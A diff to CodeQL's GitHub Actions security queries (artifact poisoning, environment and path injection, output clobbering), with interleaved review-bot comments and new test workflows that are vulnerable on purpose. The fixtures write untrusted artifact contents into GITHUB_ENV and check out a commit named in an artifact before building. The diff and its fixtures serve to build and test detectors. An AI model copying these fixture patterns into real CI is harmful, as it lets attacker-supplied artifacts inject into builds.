@@ -213,24 +225,30 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.getACommand().matches("%github.event.workflow_run.artifacts_url%") and + this.getScript().getACommand().matches("%github.event.workflow_run.artifacts_url%") and ( - this.getACommand().regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(this.getACommand() + normalizePath(trimQuotes(this.getScript() + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else result = "GITHUB_WORKSPACE/" @@ -246,7 +264,7 @@ class ArtifactPoisoningSink extends DataFlow::Node { // excluding artifacts downloaded to /tmp not download.getPath().regexpMatch("^/tmp.*") and ( - poisonable.(Run).getScriptScalar() = this.asExpr() and + poisonable.(Run).getScript() = this.asExpr() and ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact 
@@ -280,7 +298,7 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { pred instanceof ArtifactSource and pred.asExpr().(Step).getAFollowingStep() = step and ( - succ.asExpr() = step.(Run).getScriptScalar() or + succ.asExpr() = step.(Run).getScript() or succ.asExpr() = step.(UsesStep) ) ) @@ -288,8 +306,8 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof ArtifactSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index ca72fe00d161..fac498f72dab 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -31,8 +31,8 @@ private module CodeInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 86de44c3b5ca..86c7d989522b 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -283,8 +283,8 @@ class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { BashCommentVsHeadDateCheck() { // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then exists(string cmd1, string cmd2 | - cmd1 = this.getACommand() and - cmd2 = this.getACommand() and + cmd1 = this.getScript().getACommand() and + cmd2 = this.getScript().getACommand() and not cmd1 = cmd2 and cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 1f53c9384369..859f625e068d 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -25,15 +25,15 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { step instanceof UntrustedArtifactDownloadStep or step instanceof PRHeadCheckoutStep ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_PATH", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubPathWrite(cmd) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubPath(run, _) + run.getScript().fileToGitHubPath(_) ) ) } 
@@ -49,9 +49,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { EnvPathInjectionFromCommandSink() { exists(CommandSource source | - this.asExpr() = source.getEnclosingRun().getScriptScalar() and - Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_PATH", - _) + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubPathWrite(source.getCommand()) ) } } @@ -67,9 +66,9 @@ class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_PATH", _) and + run.getScript().getAnEnvReachingGitHubPathWrite(var_name) and exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScript() = this.asExpr() ) } } @@ -90,8 +89,12 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) or + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) or + run.getScript().getAnEnvReachingGitHubPathWrite(var) + ) ) or exists(Uses step | 
@@ -104,8 +107,8 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index dd6b8342185f..214e97fed6ba 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -28,15 +28,15 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step instanceof UntrustedArtifactDownloadStep or step instanceof PRHeadCheckoutStep ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubEnvWrite(cmd, _) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubEnv(run, _) + run.getScript().fileToGitHubEnv(_) ) ) } @@ -52,9 +52,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { EnvVarInjectionFromCommandSink() { exists(CommandSource source | - this.asExpr() = source.getEnclosingRun().getScriptScalar() and - Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_ENV", - _) + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), _) ) } } 
@@ -71,8 +70,8 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() and - Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_ENV", _) + run.getScript() = this.asExpr() and + run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, _) ) } } @@ -109,8 +108,12 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + ) ) or exists(Uses step | @@ -123,8 +126,8 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4f9eeef75793..e959c7d60ca5 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
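Review bot: EnvVarInjectionConfig.isAdditionalFlowStep now only propagates env vars that reach a GITHUB_ENV or GITHUB_OUTPUT write, whereas the parallel change to EnvPathInjectionConfig.isAdditionalFlowStep (EnvPathInjectionQuery.qll, earlier in this patch) keeps all three targets including GITHUB_PATH; before this commit both used the same `["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"]` list. If the divergence is deliberate (the env-var sink only needs GITHUB_ENV), a comment such as `// GITHUB_PATH writes are handled by EnvPathInjectionQuery` on the disjunction would document it; if not, adding `or run.getScript().getAnEnvReachingGitHubPathWrite(var)` restores the previous coverage. I cannot tell from the hunk alone which was intended.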
@@ -19,7 +19,7 @@ abstract class OutputClobberingSink extends DataFlow::Node { } */ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { - exists(Run run, Step step | + exists(Run run, Step step, string field1, string field2 | ( step instanceof UntrustedArtifactDownloadStep or @@ -31,7 +31,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { exists(Uses uses | step = uses and uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or step instanceof GitMutableRefCheckout @@ -43,14 +44,28 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { step instanceof GhSHACheckout ) and step.getAFollowingStep() = run and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field1) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field1, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + // A write to GITHUB_OUTPUT that is attacker-controlled ( + // echo "sha=$(> $GITHUB_OUTPUT exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubOutputWrite(cmd, field2) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubOutput(run, _) + // cat test-results/.vars >> $GITHUB_OUTPUT + run.getScript().fileToGitHubOutput(_) and + field2 = "UNKNOWN" ) ) } 
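Review bot: OutputClobberingFromFileReadSink binds a trusted write to `field1` and an attacker-controlled write to `field2` but never requires them to differ, unlike the sibling OutputClobberingFromEnvVarSink in the next hunk, which ends with `not field2 = field1`. As written, a script whose only writes are `echo "x=safe"` and `echo "x=$(cat f)"` to the same output key is reported as a clobbering sink even though no other output can be overwritten. Adding `not field2 = field1` as the final conjunct of the outer `exists` (and, presumably, leaving the `field2 = "UNKNOWN"` branch as a wildcard) would make the two sinks consistent. The characteristic predicate starts before this hunk's first line.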
@@ -66,16 +81,24 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { */ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { OutputClobberingFromEnvVarSink() { - exists(Run run, string var, string field | - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string field2 | - run.getAWriteToGitHubOutput(field2, _) and - not field2 = field + exists(Run run, string field1, string field2 | + // A write to GITHUB_OUTPUT that is attacker-controlled + exists(string var | + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field1) and + exists(run.getInScopeEnvVarExpr(var)) and + run.getScript() = this.asExpr() + ) and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field2) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field2, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") ) and - exists(run.getInScopeEnvVarExpr(var)) and - run.getScriptScalar() = this.asExpr() + not field2 = field1 ) } } 
@@ -97,13 +120,18 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { * echo $BODY */ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + string clobbering_var; + string clobbered_value; + WorkflowCommandClobberingFromEnvVarSink() { - exists(Run run, string clobbering_line, string var_name | - Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and - run.getACommand() = clobbering_line and - clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and - exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + exists(Run run, string workflow_cmd_stmt, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and + clobbering_stmt.regexpMatch("echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + clobbering_var + ".*") and + exists(run.getInScopeEnvVarExpr(clobbering_var)) and + run.getScript().getAStmt() = workflow_cmd_stmt and + clobbered_value = + trimQuotes(workflow_cmd_stmt.regexpCapture(".*::set-output\\s+name=.*::(.*)", 1)) ) } } @@ -133,30 +161,35 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { * echo "::set-output name=OUTPUT::SAFE" */ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { + string clobbering_cmd; + WorkflowCommandClobberingFromFileReadSink() { - exists(Run run, string clobbering_line | - run.getScriptScalar() = this.asExpr() and - Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and - run.getACommand() = clobbering_line and + exists(Run run, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and ( - // A file is read and its content is assigned to an env var that gets printed to stdout + // A file's content is assigned to an env var that gets printed to stdout // - run: | // foo=$(> $GITHUB_OUTPUT echo "OUTPUT_2=$(> $GITHUB_OUTPUT 
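Review bot: In WorkflowCommandClobberingFromEnvVarSink the regex built from `clobbering_var` has no terminator after the variable name, so `echo "$PR"` and `echo "$PR_NUMBER"` both match when `clobbering_var` is `PR`, which can attribute a clobbering statement to the wrong in-scope env var. Appending a word boundary, `clobbering_stmt.regexpMatch("echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + clobbering_var + "\\b.*")`, keeps `${PR}` and `"$PR"` matching while rejecting longer names. Separately, the `workflow_cmd_stmt` and `clobbering_stmt` conjuncts are independent statements of the same script, so nothing checks that the `::set-output` line is actually followed by the echo; if ordering matters for the query, that should either be enforced or stated in the class doc comment.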
diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml new file mode 100644 index 000000000000..4241647d3e11 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml new file mode 100644 index 000000000000..0c2059521020 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml 
@@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml new file mode 100644 index 000000000000..71f590fbc9c7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml @@ -0,0 +1,20 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV 
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 000000000000..e4845a6f2f16 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml @@ -0,0 +1,26 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 000000000000..67209267b5c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 000000000000..af9f01b572f1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml 
@@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 000000000000..e35bc73c3bda --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml 
@@ -0,0 +1,29 @@
+name: SnapshotPR
+on:
+ workflow_run:
+ workflows:
+ - ApprovalComment
+ types:
+ - completed
+jobs:
+ snapshot:
+ permissions:
+ id-token: write
+ pull-requests: write
+ statuses: write
+ if: github.event.workflow_run.conclusion == 'success'
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ - uses: ./.github/actions/download-artifact-2
+ - id: metadata
+ run: |
+ pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)"
+ pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"
+ echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"
+ echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV"
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ with:
+ ref: ${{ env.PR_COMMIT }}
+ - uses: ./.github/actions/install-deps
+ - run: make snapshot
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
index aff785242f9b..220eaf336637 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
@@ -1,4 +1,9 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | 
.github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | 
@@ -25,6 +30,16 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| 
